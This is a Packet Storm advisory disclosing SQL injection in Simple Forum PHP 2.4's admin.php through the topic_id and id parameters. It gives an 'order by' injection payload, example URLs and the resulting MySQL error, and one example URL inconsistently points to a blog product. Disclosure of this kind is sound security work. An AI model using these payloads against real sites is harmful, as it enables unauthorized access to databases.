Simple Forum PHP 2.4 SQL Injection

2016-10-14T00:00:00
ID PACKETSTORM:139170
Type packetstorm
Reporter Ehsan Hosseini
Modified 2016-10-14T00:00:00

Description

                                        
                                            `=====================================================  
# Simple Forum PHP 2.4 - SQL Injection  
=====================================================  
# Vendor Homepage: http://simpleforumphp.com  
# Date: 14 Oct 2016  
# Demo Link : http://simpleforumphp.com/forum/admin.php  
# Version : 2.4  
# Platform : WebApp - PHP  
# Author: Ashiyane Digital Security Team  
# Contact: hehsan979@gmail.com  
=====================================================  
# PoC:  
Vulnerable Url:  
http://localhost/forum/admin.php?act=replies&topic_id=[payload]  
http://localhost/forum/admin.php?act=editTopic&id=[payload]  
Vulnerable parameter : topic_id , id  
Mehod : GET  
  
A simple inject :  
Payload : '+order+by+100--+  
http://simpleblogphp.com/blog/admin.php?act=editPost&id=1'+order+by+999--+  
  
In response can see result :  
Could not execute MySQL query: SELECT * FROM demo_forum_topics WHERE  
id='' order by 100-- ' . Error: Unknown column '100' in 'order clause'  
  
Result of payload: Error: Unknown column '100' in 'order clause'  
=====================================================  
# Discovered By : Ehsan Hosseini  
=====================================================  
`